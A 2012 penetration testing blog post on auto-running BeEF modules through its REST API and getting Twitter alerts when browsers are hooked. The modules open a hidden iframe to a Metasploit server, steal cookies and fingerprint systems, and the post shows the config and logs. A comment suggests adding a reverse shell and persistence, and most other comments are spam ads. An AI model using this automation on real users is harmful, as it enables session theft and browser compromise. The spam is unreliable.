Monday, August 13, 2012

Happy Hooking! - BeEF autorun and Twitter notify

Today's post is contributed by Ryan Linn.

In previous posts, we’ve looked at both how to use BeEF in a real world pen test, as well as how to use the REST API to automate common tasks in BeEF. In this post, we’re going to take a look at how to use the REST API to auto-run multiple modules at one time, and set up Twitter notification.

Why would we want to do this? In the Real World series, we looked at number of modules that can be helpful when profiling browsers. But, what if we want to run them automatically so we don’t have to point and click for each new hooked zombie? By default, BeEF allows for a single module to be auto-run. But, we can auto-run a number of different modules, and even customize them for specific browsers using the REST API.

Now we can easily manage more zombies coming in at a time from a social engineering campaign. Also, we have ensured that we have maximized the information we can get from the browser regardless how long a browser is hooked!

To get the scripts, start by going to https://github.com/SpiderLabs/beef_injection_framework and downloading the framework tools. There will be two tools that we’ll be looking at in this blog post. The first is the autorun.rb script that will handle the autorun functionality. The second is the dump_mod_info.rb script, that will output all of the modules we may use.

To get the list of modules, let’s begin by starting our BeEF Instance:

$ ./beef
[17:57:07][*] Browser Exploitation Framework (BeEF)
[17:57:07] | Version 0.4.3.6-alpha
[17:57:07] | Website http://beefproject.com
[17:57:07] | Run 'beef -h' for basic help.
[17:57:07] |_ Run 'git pull' to update to the latest revision.
[17:57:08][*] BeEF is loading. Wait a few seconds...
[17:57:08][*] 8 extensions loaded:
[17:57:08] | Events
[17:57:08] | Requester
[17:57:08] | Proxy
[17:57:08] | Console
[17:57:08] | XSSRays
[17:57:08] | Demos
[17:57:08] | Autoloader
[17:57:08] |_ Admin UI
[17:57:08][*] 114 modules enabled.
[17:57:08][*] 2 network interfaces were detected.
[17:57:08][+] running on network interface: 127.0.0.1
[17:57:08] | Hook URL: http://127.0.0.1:3000/hook.js
[17:57:08] |_ UI URL: http://127.0.0.1:3000/ui/panel
[17:57:08][+] running on network interface: 172.16.149.141

[17:57:08] | Hook URL: http://172.16.149.141:3000/hook.js
[17:57:08] |_ UI URL: http://172.16.149.141:3000/ui/panel
[17:57:08][*] RESTful API key: fba4fc47a6d56c4b23b29027a4ea4524c410643f
[17:57:08][*] HTTP Proxy: http://127.0.0.1:6789
[17:57:08][*] BeEF server started (press control+c to stop)

Next, lets dump the list of modules and pipe it into less:

$ ./dump_mod_info.rb | less

The first thing we want to do is to launch a hidden IFRAME to point to our Metasploit instance. To do this, lets find the module to create a hidden IFRAME.

When we find it in the less output, it looks like this:

MOD: invisible_iframe
Creates an invisible iframe.
OPTIONS:
  [{"name"=>"target", "ui_label"=>"URL", "value"=>"http://beefproject.com/"}]

We have one option to set: the “target.” The value is the URL we want to launch in the hidden IFRAME. To make this module auto-launch in the autorun.rb script, we open the autorun.rb script and find the autorun_mods hash.

The autorun_mods hash is a key value pair. The key is the name of the module to run, and the value is a hash of options. In this case, if we wanted to just run this one module pointing to http://localhost:8080 then we’d create our autorun_mods to be:

@autorun_mods = [
  { 'Invisible_iframe' => {'target' => 'http://127.0.0.1:8080/' }}
]

We want to do more than that though, so let’s add some more fingerprinting in:

@autorun_mods = [
  { 'Invisible_iframe' => {'target' => 'http:// 127.0.0.1:8080/' }},
  { 'Browser_fingerprinting' => {}},
  { 'Get_cookie' => {}},
  { 'Get_system_info' => {}}
]

This will launch browser fingerprinting, our invisible iframe, try to get the cookies for the visiting page, and launch a java applet that will try to fingerprint the browser’s system info. Now that this is all setup, we save our autorun.rb script and just run it:

$ ./autorun.rb

Now the script is running, we launch a browser to get hooked and watch our BeEF
window:

[18:11:45][*] New Hooked Browser [ip:127.0.0.1, type:FF-13, os:Linux], hooked domain [127.0.0.1:3000]
[18:11:50][*] Hooked browser 127.0.0.1 has been sent instructions from command module 'Create Invisible Iframe'
[18:11:50][*] Hooked browser 127.0.0.1 has been sent instructions from command module 'Fingerprint Browser'
[18:11:50][*] Hooked browser 127.0.0.1 has been sent instructions from command module 'Get Cookie'
[18:11:50][*] File [/home/sussurro/beef/modules/host/get_system_info/ getSystemInfo.class] bound to url [/getSystemInfo.class]
[18:11:50][*] Hooked browser 127.0.0.1 has been sent instructions from command module 'Get System Info'
[18:11:55][*] Hooked browser 127.0.0.1 has executed instructions from command module 'Get Cookie'
[18:11:55][*] Hooked browser 127.0.0.1 has executed instructions from command module 'Create Invisible Iframe'
[18:11:57][*] Hooked browser 127.0.0.1 has executed instructions from command module 'Fingerprint Browser'

We can see from the output that our auto-run script has executed the modules 5 seconds after our initial hook has taken place. This is far faster than if we had done this manually. From here, we can go into the user interface to view the results. Or, the autorun script spits out session, module, and command id’s to get the statuses of the run modules programmatically.

While these scripts are a good starting point, you may want to do more customization. This can be done by  modifying the Ruby and following the steps in the REST post and documentation.

The final piece we want to add is Twitter notification. Let's have a little birdie tell us when we've hooked our Zombies. This will make sure, if we have a social engineering campaign running, we can both auto-collect data and be notified when we start getting successes.

First we need to create a Twitter application at dev.twitter.com. Once logged in we want to create our application. Here’s the sample settings for my application, notice the permissions that are required to send DM’s.

BeEF Notifier Properties
BeEF Notifier Properties


Next, we need to create our personal access tokens for our account. To do this, there should be a link at the bottom of the page to authorize our account. Once we do, we should see another set of information about our access tokens like below:

Access Token
Access Token


Now we have all of the information to update BeEF to configure twitter notifications. We edit extensions/notifications/config.yaml and set enable to true under notifications and under twitter. Finally we configure our keys from the previous steps and our target usernames, save the file, and we should be all set.

Restart BeEF, login, and hit the link for the basic demo page, and you should get two DM’s like below:

DMs from Twitter
Direct Messages on Twitter
Now you’re all set for your campaign to begin. Sit back, wait on Twitter to tell you when you’ve got zombies, and automate as much as you can to maximize your success rate. Happy Hooking!

42 comments:

  1. If you can run a java applet for fingerprinting, can't you run a reverse shell and persistence too?

    ReplyDelete
  2. I was attempting to run some modules on beef at startup. i.e in the moudules insert autorun: true
    Im using kali linux. I thought to use the bleeding edge repositories to update to the very latest beef-xss. Unfortunately I still get the same errors:
    For example
    Unable to load module configuration '/usr/share/beef-xss/modules/host/get_internal_ip/config.yaml'

    Hoped someone could point me in the right direction.

    ReplyDelete
  3. how can i execute a module on beef startup
    i want execute fake flash update but alwaiz appears that error unable to load bla bla ... plz somebody help me

    ReplyDelete
  4. how can i execute a module on beef startup
    i want execute fake flash update but alwaiz appears that error unable to load bla bla ... plz somebody help me

    ReplyDelete
  5. Why would we want to do this? In the Real World series, we looked at number of modules that can be helpful when profiling browsers. But, what if we want to run them automatically so we don’t have to point and click for each new hooked zombie? send push notifications

    ReplyDelete
  6. It's known all over the world that young people don't want to waste their time and they use https://college-homework-help.org/blog/make-homework-fun So I can say that it's mostly not ta problem. they have to read more. And that's all.

    ReplyDelete
  7. Good Post! Thank you so much for sharing this pretty post, it was so good to read and useful to improve my knowledge as updated one, keep blogging.

    Selenium with python Training in Electronic City

    ReplyDelete
  8. • Assignments are designed to make the students burn the midnight oil every day. Students experience depression, anxiety problems and undesirable stress due to so much work and so on. So they tend to move towards taking Assignment Help

    ReplyDelete
  9. Positive site, where did u come up with the information on this posting?I have read a few of the articles on your website now, and I really like your style. Thanks a million and please keep up the effective work. smm panels list

    ReplyDelete
  10. This is where you might have started your search for assignment help.The previous consumers give their feedback on the website to let the other users know about the quality of their service. For example, if you go to the allassignmenthelp Reviews, you can get to know the opinion of different users about their services. You can also check other websites to compare and select the best service for you.AllAssignmentHelp.com reviews

    ReplyDelete
  11. Our assignment help experts could address students' academic topics quite well. Thus, they can opt for our service if they have difficulty in writing the academic task.
    assignment help

    ReplyDelete
  12. ABC Assignment Help provides professional Perdisco assignment help in various subjects for students studying in colleges and Universities across Australia, UK, USA, New Zealand and Canada. We deliver quality solutions for assignments in over 100 subjects. Our tutors focus on providing step-by-step solution to every assignment problem. As a trusted brand among students, we strive to provide 100% unique solutions at an affordable price.

    ReplyDelete
  13. My Assignment Help is an incomparable online Assignment help company delivering excellent academic assignments, essays, coursework and reports. Through a team of over 3000 subject experts we ensure individual attention to every student making the assignment help experience completely personalized in nature.

    ReplyDelete
  14. Our buy custom research paper services are very affordable as we provide you with work that is at a golden equilibrium, try our buy research paper online services today.

    ReplyDelete
  15. I’m really amazed with your posting skills as well as with the layout on your blog site. www.appslure.com

    ReplyDelete
  16. Norton Security Deluxe is new applications that have all the qualities of Norton antivirus with some extra services.
    norton.com/setup
    norton.com/setup
    norton.com/setup
    norton.com/setup
    norton.com/setup

    ReplyDelete
  17. One thing that you will realize as you start working with us is that our Write My Essay Services are of good quality and an affordable price. In the field of sports, betting is very unpredictable, but for our case, you have a sure bet concerning the quality of services for all your Cheap Paper Writing Services.

    ReplyDelete
  18. شركة النمل الأبيض للتحكم في الدمام مهمة لأن النمل الأبيض أخطر الحشرات على المنازل ويؤدي إلى تدميرها وتخريبها ويجب عند وجود النمل الأبيض في المنزل الاتصال بأفضل شركة للتحكم بالنمل الأبيض في الدمام للقضاء أخيرًا على هذه الحشرة الخطيرة.
    ارخص شركة مكافحة حشرات

    ReplyDelete

  19. I like this blog its really informative, and i also have some other blogs which you should read.


    Avast Login
    garmin.com/express
    avg.com/retailbullguard support number

    ReplyDelete
  20. مواصفات العزل بالرياض
    ترميمات ما قبل العزل
    سعر متر عزل الاسطح
    كيفية عزل الأسطح
    شركة عوازل بالرياض
    شركة عزل خزانات بالرياض
    always exposed to the surfaces of natural factors such as high temperature and rainfall as it adversely affects the insulation of rooftops and hence comes the role of roof insulation company in Riyadh Where we have the latest means of insulation and security as we provide all the services of insulation surfaces and a lot of services that serve many areas ...

    ReplyDelete
  21. شركة عزل بولي يوريثان بالرياض
    شركة عزل فوم بالرياض
    شركة عزل اسطح بالرياض
    افضل شركة عزل خزانات بالرياض
    شركة عزل بالرياض
    2 - Waterproofing, which is the protection of the surface of the water from heavy rain as the water pools cause cracks, which leads to water leakage and the emergence of moisture in buildings and roofs of buildings, which leads to the occurrence of short circuit and water insulation is used in the Gulf countries where water Salty lead to damage to all building materials is used in the insulation of the roofs of buildings and tanks and floor of bathrooms and kitchens and insulation of concrete water tanks, therefore provide you with roof

    ReplyDelete
  22. Very good blog on this topic and its appreciating really.Let know of me -> Garmin Express Thanks for sharing this amazing knowledge with us.

    ReplyDelete
  23. kepuasan dalam bercinta bisa diraih oleh kedua pasangan asal selalu menjaga stamina sebelum beraktifitas seksual, namun akhir-akhir ini banyak wanita yang mengeluh karena banyak pria yang tidak bisa memberi kepuasan lantaran mereka mengalami disfungsi ereksi sehingga alat vital tidak dapat ereksi ketika mau berhubungan intim, dengan hadirnya pil biru asli cod di cikarang bisa memberikan segalanya bagi pasutri yang ingin mencapai klimaks ketika berhubungan badan baca seterusnya . kebutuhan biologis memang sangat penting untuk anda perhatikan karena jika sampai hal ini kita diamkan maka bisa mengakibatkan retaknya hubungan keluarga hingga dapat menimbulkan penceraian. jual permen soloco cod di karawang barat solusi terbaik bagi pria yang tidak bisa mengonsumsi jenis tablet karena rasanya yang pahit. permen soloco memiliki rasa coklat yang kebanyakan disuka oleh pria maupun wanita dengan rasa yang khas. klik disini . kini klg di semarang tengah banyak anda jumpai ditoko obat yang menjual obat-obatan khas untuk pria akan tetapi keaslian produk harus anda ketehaui sebelum anda membelinya ditempat tersebut info lebih lanjut .

    ReplyDelete
  24. There are plenty of smm panel around the world. All Marketing Trends is the number one among them. Thank you for the post. I'll definitely comeback.

    ReplyDelete
  25. joker โบนัส100 เครดิตฟรี เล่นง่าย ได้จริง slot online
    https://www.slot4u.com/joker123

    ReplyDelete

  26. شركة تنظيف الامارات

    شركة تنظيف دبي شركة نظافة بدبي
    شركة تنظيف كنب دبي بالبخار تنظيف كنب دبي بالبخار
    شركة غسيل سجاد بدبي غسيل سجاد دبي
    شركة تنظيف في ابوظبي شركات تنظيف ابوظبي
    شركة تنظيف منازل فى العين شركة تنظيف منازل العين
    شركات تنظيف كنب في ابوظبي شركات تنظيف كنب ابوظبي




    ReplyDelete
  27. New Year of Calendar 2020 is coming therefore everyone eager to know and welcoming new year 2020. Everyone now searching for Calendar in their own language like Tamil Calendar 2020 Tamil Calendar, Hindi Calendar, MArathi Calendar etc. Different traditions have different festivals and many more.
    Get More updates of upcoming Easter Festivals : Easter 2020

    ReplyDelete
  28. A community for technical news and discussion of information security and closely related topics.

    click to download

    ReplyDelete
  29. For high profile escort service in Bangalore, we contact you directly on our website. We provide you call girls in Bangalore at cheap and good rates. Welcome to Bangalore Escort Service.Bangalore escort service

    ReplyDelete